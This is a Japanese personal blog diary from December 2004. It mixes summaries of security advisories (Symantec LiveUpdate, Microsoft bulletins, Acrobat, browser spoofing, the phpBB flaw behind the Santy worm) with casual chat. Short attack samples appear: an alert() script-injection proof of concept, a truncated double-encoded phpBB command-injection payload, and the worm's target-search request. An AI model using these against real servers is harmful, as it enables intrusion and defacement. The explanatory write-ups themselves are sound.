security team が発見しました。この脆弱性は、Symantec Automatic LiveUpdate が、システム権限でインターネットオプションの操作を許していることが原因となっています。これは、スケジュールされた "NetDetect" が動作中の LiveUpdate の GUI を通じて攻略することが可能です。この脆弱性をうまく攻略できた場合、システム権限での任意のコマンドの実行が可能となります。解決方法:Symantec Windows LiveUpdate version 2.5 へバージョンアップしてください。影響を受けるソフトウェア:Norton AntiVirus 2001Norton AntiVirus 2002Norton Internet Security 2001Norton Internet Security 2002Norton Internet Security 2003Norton Internet Security 2003 ProfessionalNorton Internet Security 2004Norton Internet Security 2004 ProfessionalNorton SystemWorks 2001Norton SystemWorks 2002Norton SystemWorks 2003Norton SystemWorks 2004Symantec AntiVirus for Handhelds 3.xSymantec Norton AntiVirus 2003Symantec Norton AntiVirus 2004Symantec Windows LiveUpdate 1.xSymantec Windows LiveUpdate 2.x オリジナルアドバイザリ:
- SYM04-018 Symantec Windows LiveUpdate Configuration Options Elevation of Privilege
Symantec Automatic LiveUpdate がスタートアップで起動されるとき、ローカルシステム権限が付与されているので、LiveUpdate セッションが有効な間に GUI でインターネットオプションを操作することで、結果としてシステム権限での任意のコマンド実行が可能となる、という脆弱性のようです。企業などで、一般ユーザに Administrator 権限を与えていない場合は注意が必要ですかね。[セキュリティ] 今日はMSの月間セキュリティアップデートの日♪textile
- MS04-041
[重要] WordPad の脆弱性により、コードが実行される (885836)リモートでコードが実行される可能性のある 2 つの脆弱性が WordPad に存在します。この脆弱性を悪用するためにはユーザーによる操作が必要です。関連: * Microsoft Word 6.0/95 Document Converter Buffer Overflow Vulnerability (iDEFENSE)www.idefense.com/application/poi/display?id=162&type=vulnerabilities
- MS04-042
[重要] DHCP の脆弱性により、リモートでコードが実行され、サービス拒否が起こる (885249)DHCP Server サービスに 2 つの脆弱性が存在します。一方の、より深刻な脆弱性によりリモートでコードが実行される可能性があります。DHCP Server サービスは規定ではインストールされません。影響を受ける DHCP サーバーは Windows NT4.0 のもののみです。
- MS04-043
[重要] ハイパー ターミナルの脆弱性により、コードが実行される (873339)リモートでコードを実行する脆弱性が HyperTerminal に存在します。この脆弱性を悪用するためには、ユーザーによる操作が必要です。関連: * Security-Assessment.com - Advisories
- MS04-044
[重要] Windows カーネルおよび LSASS の脆弱性により、特権の昇格が起こる (885835)Windows Kernel と Local Security Authority Subsystem Service (LSASS) に 2 つの脆弱性が存在し、特権の昇格が行われる可能性があります。この脆弱性を悪用するためには、攻撃者は正しいログオン資格情報を使用しローカルにログオンする必要があります。
- MS04-045
[重要] WINS の脆弱性により、リモートでコードが実行される (870763)Windows Internet Naming Service (WINS) に 2 つの脆弱性が存在し、リモートでコードが実行される可能性があります。WINS Server サービスは規定ではインストールされません。関連: 、* November 26, 2004 - Wins remote vulnerability (IMMUNITY)
**[PDF]**```Windows Kernel と LSASS の脆弱性によってローカルユーザが権限昇格を行うことができるという MS04-044 がちょっと気になりますかね。**[12:09追記]** IT Pro に日本語の詳細な記事が出ました。すばやい♪⇒* Windowsに複数のセキュリティ・ホール,Windows Updateの実施を (IT Pro)
[セキュリティ] * Adobe Acrobat Reader 5.0.9 mailListIsPdf() Buffer Overflow Vulnerability (iDEFENSE)www.idefense.com/application/poi/display?id=161&type=vulnerabilities
要点を適当に和訳:```textileUNIX版の Adobe Acrobat Reader ver5.09 にはバッファオーバーフローが引き起こされる問題があり、これによって任意のコードを実行させられてしまう恐れがあります。この脆弱性は、mailListIsPdf() 関数の中に存在します。この関数は、与えられた入力ファイルが PDF を含んだ EMailメッセージかどうかを確認するものです。この関数の中で、ユーザが与えたデータを strcat を使ってサイズが固定されたバッファに安全でない方法でコピーしているために、バッファオーバーフローが発生します。攻撃者によって、この問題を攻略された場合、閲覧者の権限での任意のコード実行が行われます。解決策この問題は Adobe Acrobat Reader 5.0.10 for Unix で修正されています。詳しくは、ベンダーの情報を参照してください:
```UNIX版の Acrobat Reader 5.09以前を使っている方はアップデートを。[セキュリティ] * [ZH2004-18SA] Content-Type spoofing in Mozilla Firefox and Opera could allow users to bypass security restrictions
超適当に和訳:textileいくつかのブラウザには、Content-Type を詐称することで、ユーザに強制的にページを表示させ、セキュリティゾーンの制限を回避してローカルゾーン権限でのJavaScriptの実行を許してしまう問題があります。例えば、被害者が http://malicious_server/paage.html を訪れたとき、悪意のあるWebサーバが Content-Type: text/html. (最後の「.」に注目。) などの特別な Content-Type フィールドを返答します。これによって、ブラウザは open/save/cancel を選ばせるダイアログを表示します。ここで、open が選ばれた場合、コンテンツがダウンロードされ、ローカルファイルとして開かれてしまいます。(JavaScriptコードがローカル権限で動作してしまいます。)**影響のあるブラウザ:**- Firefox 1.0 - Mozilla 1.7.x - Opera 7.51,..7.54この問題によって、ホームディレクトリ上のファイルやブラウザのキャッシュを不正に読み取られてしまう・・・ということらしいです。[雑談] * ブログの人気度を測定 feed meter
textile『a threadless kite - 糸の切れた凧』のフィードメーター人気度1.3 更新頻度4.6 (21.79 アイテム/日)“RSSフィードの「人気度」と「更新頻度」をシンプルに段階表示”ということでやってみました。もっともっと精進しなきゃいけないなぁ...(汗 (←色々比べてみた。(笑))ネタ元: * ウェブログの人気度を測定する FeedMater (津田ふみかの日記)
[雑談] * ウワサの車用“しっぽ”を動かしてきました (ITmedia)
textileクルマが“しっぽ”を振っていたら、それは「ありがとう」の意味だ。ワコーが12月17日に発売する「サンクステイル」は、車に装着する電動の“しっぽ”。たとえば道を譲ってもらったとき。たとえば渋滞中の列に割り込ませてもらったとき。運転席でワイヤレスリモコンのスイッチを押すと、後部に取り付けた“しっぽ”が左右にひょこひょこと動いて、周りの人や車に感謝の気持ちを伝えてくれる。コンセプトはとっても可愛いと思うんだけど、いまいち目立たない感じ。もっと大きくて分かりやすいのにすれば良いのにー。(って、それだと走行のジャマになるのか?(^-^;)
この他にも、安全運転を犬が判定してくれるグッズとか、ワイパーにつけるとワイパーを動かした時に遠心力でエイリアンが出てくるグッズ(笑)とか不思議な小物が紹介されていました。2004/12/16(木)木曜日ー。(忘年会シーズン。)
[セキュリティ] * MSIE DHTML Edit Control Cross Site Scripting Vulnerability (Bugtraq)
『』の時にも攻略に使われた“DHTMLエディットコントロール”ですが、今度は、このコントロールを悪用してクロスサイトスクリプティング(と同等の現象)を起こす手法が報告されたようです。この手法を使うと、クロスサイトスクリプティング脆弱性の無いサイトに対してもスクリプトを挿入することができるようです。あらまぁ。(汗検証例: http://freehost07.websamba.com/greyhats/abusiveparent.htm[セキュリティ] Yahoo! Mail と Hotmail にクロスサイトスクリプティング脆弱性
- [Full-Disclosure] Yahoo! Mail Cross-Site Scripting Vulnerability
- [Full-Disclosure] Hotmail Cross-Site Scripting Vulnerability #1
- [Full-Disclosure] Hotmail Cross-Site Scripting Vulnerability #2
HTMLメールを開くと同時に、メール本文に隠してあるスクリプトが実行されてしまう問題が存在した、と。これを攻撃者に利用されると、セッションをのっとられて他のメールを盗み見られたり、フィッシング詐欺に悪用されたりする恐れがあったのでしょうね。すでに修正済みとのこと。(修正が完了したため発表となったようですね。)[雑談] * 東京メトロとデル、日比谷線銀座駅でコラボ
textile東京地下鉄株式会社とデル株式会社は2004年12月16日、日比谷線銀座駅構内コンコースに、インターネットに常時接続している PC を貸し出す「Mediaspot」と、デルの PC の展示及びインターネットによる注文ができる「DELL Real Site」のコラボレーションスペースを12月20日にオープンする、と発表した。PC 貸し出しの利用料金は1月31日まで無料、以降1時間100円。最初、『無線LAN を強調する以上、貸し出すのは当然ノートマシンだよね? 持って移動しても良いのかなぁ』とか色々想像したんですが、やっぱり持ち歩きは、×?(^-^;[IT] * P2Pファイル交換ソフトはわずか15行のコードで書ける〜米大学教授が実証
textileコンピュータセキュリティを研究している米プリンストン大学のEdward Felten教授が、わずか15行のソースコードで成り立っているP2Pファイル交換アプリケーション「TinyP2P」を公開した。…Felten教授はこのようなアプリケーションを開発した経緯について「P2Pアプリケーションを規制する難しさを実証するために、TinyP2Pを書いた。P2Pアプリケーションは非常に簡単に開発でき、普通の技術を持つプログラマーは誰でも書くことができる。こうしたものの創造を禁止する試みは実を結ばないだろう」と説明している。実際のソースコードは、『* TinyP2P - The World's Smallest P2P Application
』に置いてあります。Python で書かれていて、HTTP と XML-RPC を使って、カレントディレクトリにあるファイルを共有する仕組みのようですね。短ーい。(^-^;[雑談] * バンダイネットワークス、新世紀エヴァンゲリオンの綾波レイがコンセプトのiPodセットを発売
なかなかお洒落な感じに仕上がっているかも。(ぇ2004/12/17(金)金曜日ー。(一週間って早いねぇ。)
[雑談] * ソースネクスト、「モテ力」を無料診断する「大人力診断所」
**# まー (2004/12/16(Thu) 14:27) **れっつちゃれんじ♪
ありがとーございます♪ さっそく。(↓)
※ソースネクストのこれ系のサイトは、後から無料メルマガが来るようになったりするので、ご注意を。(^-^;textile上司力検定:十両級 (17点)あなたの上司力は、いちおう上司っぽく振る舞うことはできるという程度の実力。部下に恵まれれば無難な上司にはなれそうです。今のポジションに安住せず、上司力に磨きをかけて、さらにイカした上司を目指しましょう。ベンチャー力検定:アニキ級 (15点)あなたは、ウマが合う部下からは「アニキ」と慕われる立場になれる程度のベンチャー力は持っています。大それた野望を抱かなければ何とかなるでしょうが、サラリーマンと比べてどっちがいいと考えるかはあなた次第です。宴会力検定:飲めや歌えや級 (18点)あなたほどの並はずれた宴会力があれば、どんな宴会でも楽しめるし、たいていのピンチは乗り越えられるはずです。これからも宴会の場をリードし続けるのが、あなたが天から授かった使命と言っても過言ではありません。モテ力検定:十人並み級 (14点)あなたは、そこそこのモテ力の持ち主。本人の努力や心がけに応じて、出会いに恵まれたり、男女交際の醍醐味を味わえたりするでしょう。「自分はモテるタイプ」とカン違いすることだって、けっして不可能ではありません。私に『宴会力』なんてものが無いことは、一度でも私に会ったことがある人は全員分かるくらいなんですけどねぇ。(笑) あとは、『モテ力』があくまでも“勘違い”なのがちょっと笑えました。(^-^; 来年1月になったら、残りの2つの診断も可能になるようなので、覚えてたらやりましょう。(なるほど、こうすれば少なくとも2ヶ月はメルマガを取るであろうことが狙いですかい?!>ソースネクスト)[雑談] * 「ネット上の人格」がキーポイント、今どきの恋愛 (Hotwired)
- ずきんさんに捧げて貰いました。w
ありがとーです♪textile私は、オンラインで興味が持てない男性には実際に会っても惹かれないことを思い知った。私にとって、人と仲良くなるのに、電子メールやIMはもはや欠かせないツールになっている気がする。インターネット上で別人格を装うまではしていなくても、オンラインでメッセージを書くときには、いつもより面白くて度胸があって気さくな人格になっている。私は男性のそういった一面を知りたいと思うし、男性にそうした面がない場合には、わたしは気づいてしまうのだ。よし! オンラインで頑張るゾ!! と決意した後、ふと中学の時の数学の授業を思い出しました。orz命題: オンラインで興味が持てない男性→ 実際に会っても惹かれない逆 : 実際に会っても惹かれない→ オンラインで興味が持てない男性裏 : オンラインで興味が持てる男性→ 実際に会ったら惹かれる対偶: 実際に会ったら惹かれる→ オンラインで興味が持てる男性ある"命題"が成立する時、その"対偶"も必ず成立するわけですが、"裏"は必ずしも成立しない、ってやつ。オンラインで興味が持てるからと言って、実際に会って惹かれるわけじゃないってことね。(涙・・・やっぱりオンラインだけじゃダメか。(^-^;[雑談] * 自転車式発電機
@openmyaMLこれで sec sunbath でバッテリー切れを気にせずに競技ができます! (いや、片一方がノートマシン・もう片方が自転車漕ぎな2人組が多数散在する公園って怖すぎ!(笑) 今度こそ必ず警察に通報されます。(^-^;)比較的ふつーな前回でさえ、通行人の方々にしげしげと見つめられたりしていたのに。(笑)2004/12/18(土)土曜日ー。(クリスマスまで一週間。今年も間に合わないよぅ。)
[雑談] * バカ検定 模擬試験
textileあなたのバカ度は、44バカです。バカのタイプは、「ノー・プラン」バカです。あなたは、面倒くさいことには、初めからタッチしようとしないタイプ。また「計画性」を持たずに、その場しのぎの行動に走る傾向もあるようです。でもあなたには、強い好奇心があります。そこをうまく活かしていけば、バカ脱出の日も近いでしょう。バカ度よりも、モテナイ度を減少させたいと願う今日この頃。間に合わない〜。(笑)ネタ元: * palm84さんの日記
[雑談] * 情報主体の安心できるセキュリティを宇治市の事例から考える
過去に情報漏えい事件があった宇治市の元情報管理課長のお話だそうです。textile情報セキュリティに関して一般的に持たれている考え方を、木村氏は情報主体の視点から否定している。まず、セキュリティ対策はいくら強化しても事故発生件数の減少に直結しないと指摘。事故は攻撃者側の問題であって、防衛側の問題ではないという。はい??? 本当にそんなお話をされたんでしょうか?この方。textile情報主体*1の権利を保証するセキュリティシステムとは、機密性を確保するものではなく、情報主体の知る権利を確保しながら情報保有者に対するコントロール権を持たせるものだ。…情報漏えいを100%防ぐことはできないという事実を、きちんと情報主体に対して開示し、セキュリティ対策状態も知らせたうえで情報を預けるかどうかの取捨選択をさせるべきだとした。*1) ここで言う“情報主体”とは“市民”のことです。そんなことができれば理想なんでしょうけどねー。実際に興味を持つ市民がどれだけいるのか分かりませんが、そういう市民の 確認する機会 を奪うのは、確かに良くないと思いますし。ただ、セキュリティに関して言えば、すべてを公開してしまっては攻撃の足がかりを増やしてしまうことになりますし、公開された手順通りに実際に情報を扱ってくれてるかは確かめようがないわけですしね、、、2004/12/19(日)日曜日ー。(引きこもり〜♪)
[雑談] * あなたのセンス鑑定します!
textileあなたのセンスは 21点 です。 ヤマガタ君はキモい子です。あなたは知らないだけで影で悪口を言われているようです。おしゃれな洋服は持っていないのに、お出かけするときはいつも服装に気を使い、「今日もキマッてるわっ。」と思っていませんか。友達もそんなあなたに何も言いませんが‥‥本当は何とかして欲しいと思っているかも。もっと自分を知りましょう。まー、服装とか全然気を使ってないことは認めますが、ここまで言うかい。(笑)ネタ元: * palm84さんの日記
[雑談] Tech総研から気になった特集ネタを紹介♪
- 周りはみんなお客サマ! 常駐SEの泣き笑い人生劇場
良かったこと/悪かったこと、どんな感じです? >誰となく
- 上司に遠慮せず、“今日こそ残業しない!”術
いろーんなパターンを考えるものですな。(^-^; 『同僚の間で互いに早く帰りたい日をつくり、お互いがフォローする』ってのがちょっと“できたら良いな”って思いましたね。ちなみに、私は用があるとき(←めったにない)は、部内スケジュールに「私用。帰ります」と書いてしまいますね。(笑)
- ガマンの限界!顧客が悪魔に見えた瞬間
まー、色々とありますわな。[雑談] * 恐るべし、悪役商会。(様) - 吉井由紀ブログ!! no frills
ぷっすま の ビビリ王 を見ていて、最初の頃からいつも気になっていた 吉井由紀さん ですが、再び出演されたようですねー。(^-^) 放送が楽しみです♪[雑談] * 求める相手は「空気のような存在」!? 10代女子の「好きな男子のタイプ」(TeensLab)
textileリードする女子と、それに従う男子のカップルが増殖中!?誰かリードしてください。。。(←バカ)textileカッコイイ男子にフラれたら傷つくが、それほどカッコイイ男子でなければ「あいつならいいか」と、傷ついたり落ち込んだりせずに済む、ということも背景にあるそうだ。男子に夢中になって、気持ちが不安定になったりすることを恐れる10代女子のナイーブな一面が垣間見える。おぁ? そんな理由なのかい!(笑) ん・・・? カッコヨクナイ男にフラれた方が傷つくんじゃないのかな? (←気のせい?)textileQ:「女友達」と「彼氏」、あなたにとって信用できるのはどちらですか。 回答数比率 女友達のほうが信用できる 89 44.5% どちらも信用できる 53 26.5% 彼氏の方が信用できる 30 15.0% どちらも信用できない 28 14.0%あらー、世の中の彼氏は、女の子にあまり信用して貰えていないようで・・・。(汗[IT] * 米Microsoft、クリスマスデザインのXP用デスクトップテーマを無償公開
textile「ChristmasTheme 2004」は、クリスマスデザインのWindows XP用デスクトップテーマ。壁紙、アニメーションカーソル、デスクトップアイコン、サウンド、3Dスクリーンセーバーがセットになっている。インストール後に画面のプロパティの[テーマ]タブで“ChristmasTheme”を選択すれば、本デスクトップテーマが利用可能となる。クリスマスに寂しく自宅でマシンを立ち上げる予定の人(含む、私)は、これをインストールして・・・寂しい気分に拍車をかけてみるのは如何でしょうか?(笑)[セキュリティ] * ExploitTree (SecurityForest.com)
- kawaさん
のところで紹介されていました。CVS で同期が取れる exploit集。* WHoppix
といい、これといい、最近は色々と便利なものが出てるんですねー。(主にどんな人たちが使っているんだろう?(笑))2004/12/20(月)月曜日ー。(ラストクリスマス最終回。)
[雑談] * 各階ばらばらに「まわる」マンション (/.jp)
```textile
- CNN.co.jpの記事
経由、REUTERSによると、ブラジルのサンパウロに、各階が個別にまわるマンションが完成したとのことです。11階建て、各階が独立してどちら周りにも回転でき、1時間で1周するそうです。1階1世帯で値段は30万ドルとあります。```完成までに10年かかったそうです。(なんて無駄な・・・。(笑))[雑談] * 「おひとりさま」だからこそわかる、接客サービスの大きな勘違い (日経レストラン)
textileお茶、お酒、コンサートはおろか、1人焼肉、 1人温泉、1人ハワイを堪能。その鉄の心臓、ある意味、うらやましかったり...textile先日、旭川の居酒屋を訪れたときのことだ。まず3品頼み「足りなかったら、後で頼みます」と告げた。最初に出てきたのは、ほぼお盆と同じサイズの大皿に載っただし巻卵だった。あまりの大きさに目を白黒させていると店員さんが「卵8個分です。食べきれないようでしたら」と折と袋を用意してくれた。この後出てきたものすべてが 4人から5人前。うーん、お洒落な居酒屋さんだったらアレですけど、いかにも大衆チェーン店みたいなところだったら、そんなもんですよね。逆に、大人数で行ったのに一人前ずつ出てきたら文句言いたいくらいです。(^-^; ま、誰もアドバイスしてくれなかったのは戴けませんけどねー。(実はメニューに分量が書いてあったり?)[雑談] * Sec Sunbath 2004 参加申込み開始!
参加申込み開始とのことです。ふるって参加しましょう♪ 今度は熱射病対策じゃなくて防寒対策が必要、と。確かに。寒いんだろーなー。(汗[セキュリティ] * Microsoft Windows Media Player 9 Vulns (2) (Bugtraq)
Windows Media Player 9 に 2つの脆弱性があり、Media Player 10 で修正済みとのことです。超適当に要点を和訳:```textileWindows Media Player Allows Writing To Audio Files: (WMP-AWTAF)Windows Media Player は、Internet Explorer 内の Media Player コントロールを使用することで、アーティストや曲名を変更することを許しています。このため、攻撃者はこれらの情報を上書きすることが可能です。この問題を利用することで、もし、IE に MP3ファイルをパースさせることができたなら、マイコンピュータゾーンでのスクリプト実行を許してしまうかも知れません。検証例:WindowsMediaPlayer.currentMedia.setItemInfo("Artist",'<script>alert("Hello");</'+'script>');Windows Media Player ActiveX Object Expose Existence Of Files: (WMP-AXOEEOF)Windows Media Player 9 には、ローカルファイルの存在や、存在する場合のサイズを知られてしまう脆弱性があります。これは、getItemInfoByAtom() 関数を 引数 "19" で呼び出すことで判断可能です。この関数は、ファイルが存在しない場合は、戻り値として "0" が返り、存在する場合はファイルサイズが返ります。検証例:
```Windows XP (noSP, SP1, SP2) の Windows Media Player 9.0 で検証済みとのこと。Media Player 10 にバージョンアップすることで解決するそうです。[雑談] * 開発レポート 表面実装部品を外す〜または基板の美味しい揚げ方〜
textileぱ研では,プリント基板から部品(特に表面実装部品)を簡単かつきれいに取り外すための新手法を開発しました. …3.もし自宅で実験を行う場合は,奥さん・彼女・母親がいない時間帯を見計らって行ってください.台所は本来食品を扱うところです.万が一見つかって喧嘩になっても,ぱ研は仲介の労は取れません.基盤を油で揚げて、はんだを溶かそうという試みのようです。(^-^;[雑談] * 第2回 IT度診断テスト 〜選択式編〜 (すぎエモンのITコラム)
笑えた。(『ずきエモン』に空目してしまった私は、Love2病でしょうか?(^-^;)ネタ元: * palm84さんの日記
[雑談] * 2004年の“最も奇妙な”ゲームは? (ITmedia)
textileBad Mojo:1996年に登場し、奇妙なPCゲームの愛好家の間で定番となったバグゲームが帰ってきた。…プレーヤーはゴキブリを操縦して、「サンフランシスコのある荒れ果てたビルディングの不気味で入り組んだ世界」を探訪する…。「不気味」なものほとんどないが、「入り組んだ世界」というのは十分納得がいく。日常生活では当たり前に思っていたことに気付かされることだろう。例えば、小さな水溜まりがゴキブリにとっては渡れない堀になる。へー。ちょっと興味を惹かれるものがありますね。どれくらいの完成度なんだろう。(^-^;[TV][あいのり] #250 人生の先輩アフリカ、エチオピア縦断中。ソルトが機嫌悪すぎ。もはやイッチーにしか止められない?イッチーの「ヒデをひざ枕してあげたれ」というアクションだけで、瀬里葉が『イッチーは私を恋愛対象として見てくれていない』と思ってしまった? 考え過ぎだってばー。歯医者→瀬里葉→イッチー。ヘンな感じですれ違いにならなきゃ良いけど。(涙歯医者が皆の前で瀬里葉に告白。(何してくれるんだい、歯医者。瀬里葉が可哀想ぢゃん...) 結果は来週。瀬里葉には今までの気持ちを信じて、正しい判断をして欲しいものです。来週は、久しぶりのスペシャルだー♪思い違いかもしれないけど、まさかサキとドボクン、結婚でしょうか?(^-^)⇒* 今週のあいのり
、* あいのりウラ話(歯医者の日記)
2004/12/21(火)火曜日ー。(ブラックメール/ザ・トライアングル復活して?)
[雑談] * クリスマス独り身度チェック
textileせこせこひとりぼっち「独り身度70%」異性に真心や誠意、労力をかけてこそ愛してもらえるということを認識しましょう。それらをけちっているようではいつまでも独りでいることになってしまいます。恋愛はほかのライバルとの誠意の競い合いをしていることに目覚め、一刻も早く、異性に対しお金や時間を投資することを覚えましょう。それをしないで独り身をさびしく思うのは怠慢です。クリスマスを異性と過ごしたい方はぜひぜひ無条件の投資をする気前の良さを見せてみてください。た、怠慢ですか...(汗)ってゆーか、70% と言わず、もうほぼ 100% 一人でいるのが決定なんですがけども。(^-^;ネタ元: * palm84さんの日記
[雑談] * 大奥占い
textileヤマガタさんは 御中臈 です! あなたのタイプは御中臈。場合によっては将軍さまの寵を得ることも可能な大奥きってのはなやかな役職といえます。そんなあなたの性格は、奥ゆかしく見える才人といえるでしょう。恋愛パターンは見た目同様、古風と思いきや、案外大胆。公方様の愛のためなら、どこまでも突っ走る情の深いところがあります。そんな尽くし型のあなたですから、現代風のドライな恋愛観を持つ相手は不向きです。…攻め一方で、守りはちょっぴり苦手。受け身の状況下では、焦りから自ら不祥事を招いてしまうことも。『おちゅうろう』ですか? (←読めなかった・・・。orz)そっかそっか。守りは苦手なのかぁー。誰も攻めてくれないから気づかなかったぞ。(泣き笑い[雑談] * “被災しても自立生活が可能”な防災・省エネ住宅、積水ハウス
textile積水ハウスは12月20日、省エネ性能に優れ、大地震などの災害に強い「省エネ・防災住宅」を発表した。「被災後も自立生活が可能」とする。…太陽光発電、蓄電池、高効率ヒートポンプ給湯器…。…浴排水リサイクル・システムでは、浴槽で使用した水を浄化し、地中のタンクに一時貯蔵した上で、トイレ洗浄水として再利用する。…雨水タンクも取り付ける。…大地震の揺れを5分の1から11分の1程度に低減する免震システムを採用。そのほか、LED照明や調光可能な居室照明を蓄電システムの非常用回路にしているため、夜間停電時でも、電力消費を最小限にしながら生活を継続できる。なんかすごいことになってます。(^-^; これが役に立つような事態にはなって欲しくないものですね。(汗 まー、災害時以外にも省エネ効果があるということですが。いくらくらいするんだろう。お高いんだろうなぁ。関連: * 積水ハウス 省エネ・防災住宅のページ
[セキュリティ] * Googleのデスクトップ検索ツールに脆弱性、アップデートリリース (ITmedia)
textile攻撃者が特定のJavaアプレットを仕込んだWebサイトlにユーザーがアクセスした場合に影響を受ける。このアプレットが特定のネットワーク接続を確立し、Google Desktopを騙してユーザーのローカル検索結果とオンライン検索結果を統合する。ユーザーが不正サイトを訪れると、このアプレットがローカル検索結果のサマリーを読み取り、攻撃者のサーバに送信するという。Google Desktop検索のサマリーには、個人ファイルのコンテンツの一部が含まれることがあり、このコンテンツを攻撃者が読むことができてしまうと研究者は指摘している。バージョン番号121004(2004年12月10日)以降のもので解決済みとのこと。関連:
- 20 Dec 2004: Google Desktop Security Issue (Computer Security Lab)
- テクニカルレポート
**[PDF]**[IT] * 秘密文書印刷、これで安心 「暗号プリンター」開発 (asahi.com)
textileパソコンに入れたソフトが、印刷データを暗号化してプリンターに送るとともに、これを解読する「カギ」をつくる。プリンターに印刷を指示した人が、このカギを小さな記憶装置に入れて携帯し、プリンターに付けた読み取り装置に入れると、初めて印刷が始まる。他人に持っていかれたり、本人が考えていたのとは別のプリンターで書類が印刷されたりしてしまう失敗を防げる。暗号はその都度作り替える。経路上のデータが暗号化されていることよりも、プリンタの前に印刷した人が行かない限り印刷が始まらないことは大きいですね。仕組みとして誰にでも分かりやすいし! (あ、でも、印刷枚数が多い時とか、ユーザがずっとプリンタの前で印刷終わるの待っててくれるとは期待できないかな?(^-^;)2004/12/22(水)水曜日ー。(頑張ろう。)
[雑談] Mi「未来の地図」発売日Google で「Mi 未来の地図」を検索してこの日記にたどり着いてくださってる人が結構多いみたいなので、ちょっと調べてみました。(^-^)◆『* あいのり新主題歌、発売日決定?(わかば☆ねっと)
』によると、```textileこちらの* インターネット「ジェイブック」の商品ページ
によると、あいのり新主題歌「未来の地図」(Mi)の発売日が、2005/02/02 のようです。ちなみに定価は、1197円、レコード会社は、コロンビアミュージックエンタテインメント、品番は、COCA-3001。```ってことで、(未確認情報ですが、)2005年2月2日(水) に発売みたい?です。◆『* Mi Official Website
』の“INFORMATION”によると、12月13日付けで「CDリリースにつきましては未定となっております。」って書いてありますけどねー。発売日が決まったら、このオフィシャルサイトか、『* あいのりニュース
』でアナウンスがあるかと。[セキュリティ] * TA04-356A Exploitation of phpBB highlight parameter vulnerability (US-CERT)
要点を適当に和訳:textilephpBB はオープンソースの掲示板アプリケーションです。この phpBB の viewtopic.php には、パラメータ highlight の urlencode() において適切な処理が行われていません。このため、リモートの攻撃者によって phpBB が動作するサーバ上で任意のコマンドを実行されてしまう恐れがあります。レポートによれば、この問題は "Santy.A" ワームによって攻略されています。このワームは、"viewtopic.php" をキーワードに脆弱なサイトを探して感染します。わー、Webアプリ上を感染するワームですか。(悪夢)Perl で書かれていて、phpBB の脆弱性で広まり、サーバ上の .asp .htm .jsp .php .phtm .shtm ファイルを改ざんするそうです。(バージョン 2.0.11 以上なら安全です。)textile/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(〜略〜)%252e%2527なるほど、ダブルデコードの問題があり、「'」のサニタイズに失敗して、任意の関数(例えば、system()関数ならコマンド実行)が呼び出せる OSコマンドインジェクション の問題なのですね。関連:
- Perl.Santy (Symantec)
- WORM_SANTY.A (Trendmicro)
[雑談] * 配りましてすいません…年賀状“前倒し”配達 (zakzak)
textile静岡市有明町の静岡南郵便局(山田喜世勝局長)が、正月を前に誤って年賀状を配達していたことが、21日までに分かった。…18日午前、年賀状を受け取った人の指摘で発覚。同局は誤配した年賀状を回収し、年明けにあらためて配達するという。配達した年賀状の枚数は公表していない。回収&再配? なんだかなぁ。(^-^; そういや、そろそろ年賀状書かなきゃ...[雑談] * ソフトイーサ、SoftEther VPN 2.0対応の実験用公開サーバを運用開始 (CNET)
textileソフトイーサは12月22日、VPNソフトウェアの次版であるSoftEther VPN 2.0を使った実験用サーバ「SoftEther VPN 2.0実験用公開VPNサーバー」の運用を開始した。無償利用が可能で、実際にVPN通信を行ってSoftEther VPNの使い方を習得できるという。同サーバの運営は、2005年7月1日まで行う予定。openmyaML で話題になっていました。関連: * SoftEther VPN 2.0 実験用公開 VPN サーバーについて (SoftEther)
ところで、* 登大遊さんのblog
に、textileソフトイーサ株式会社は、今からちょうど2日後の 2004年12月24日 午前 0 時に、『SoftEther VPN User-mode Router 2.0』を公開する予定である。…『SoftEther VPN User-mode Router 2.0』を使うと、これまでは普通は「不可能」だと思われていたことが、一瞬にして可能になる。本当にマウスを数回クリックするだけで、あれっ!? と思うほど簡単に、すごいことができるようになる。という宣伝が載ってましたが、ナニモノなんでしょうね、これ。なんせ12月24日は『毎年、変な通信ソフトウェアが出てきて騒動になる日らしい』という日(笑)だそうなので要注目(?!)ですね。[雑談] らぶらぶ♪(^-^)某はせがわさんに指摘されて気づきました。取り上げてるページ(CNET,プレスリリース,登さんの日記)まで一緒♪ そりゃー、私たち、らぶらぶですから。(笑)[雑談] * 意図はどこに? livedoor BlogでHTML投稿フォームをIE限定へ (ITmedia)
textileライブドアのBlogサービス「livedoor Blog」は、HTML形式の投稿フォームについて、WindowsのInternet Explorer以外のブラウザでアクセスした場合に、自動的にテキスト形式に切り替わるように設定したと12月21日に発表した。…ただし、今回の変更に関しては、IE以外のブラウザ利用者でHTML投稿フォームを使っているユーザーなどから、「少数派の切り捨てではないか」などと不満の声も上がっている。ライブドアの発表を探してみたら・・・不満の声を受けて(?!)一部改訂したようですね:◆* [追記しました]HTML形式投稿フォームの設定につきまして (livedoor Blog)
textileご要望いただいているとおり、近頃はFirefoxやSafariといったブラウザでの利用も増えてきています。他の環境でも同等の機能が使用できるよう、引き続き改善を続けてまいります。今後ともlivedoor Blogをどうぞよろしくお願いいたします。2004/12/23(木)木曜日ー。(きっと君は来ない〜♪)
[セキュリティ] * 米Google,「Santy」ワームが“標的”を探せないようにフィルタリングを開始 (IT Pro)
textileSantyは,phpBBのセキュリティ・ホールを突いてWebサーバーに感染するワーム。感染対象サーバー,つまりphpBBを使用しているサーバーを探すために,SantyはGoogleを利用する。具体的には,phpBBに含まれるファイル(ページ)名「viewtopic.php」を使ってGoogleで検索をかけて,検索結果のサイトへ感染のためのデータを送信する。…Googleはフィルタリングを開始した。具体的には,送られてくる検索リクエストとHTTPヘッダー(User-Agent)から,Santyからのリクエストかどうかを判断する。そして,Santyからのリクエストと判断した場合には,検索結果を送信しない。対応する亜種が出るまでの一時しのぎでしょうが、何もしないよりは♪(^-^)えっと、Santy が出すリクエストは下記のような感じですかね:textileGET /search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22topic%3D15386%22&btnG=Search HTTP/1.0Host: www.google.comAccept:*/*Accept-Language: en-us,en-gb;q=0.7,en;q=0.3Pragma: no-cacheCache-Control: no-cacheReferer: http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22topic%3D15386%22&btnG=SearchUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: close普通の検索と区別できないリクエストを出す亜種が出るのが先か、みんなが対策を実施して感染対象が減ってワーム作者が飽きるのが先か?!(^-^;[雑談] * 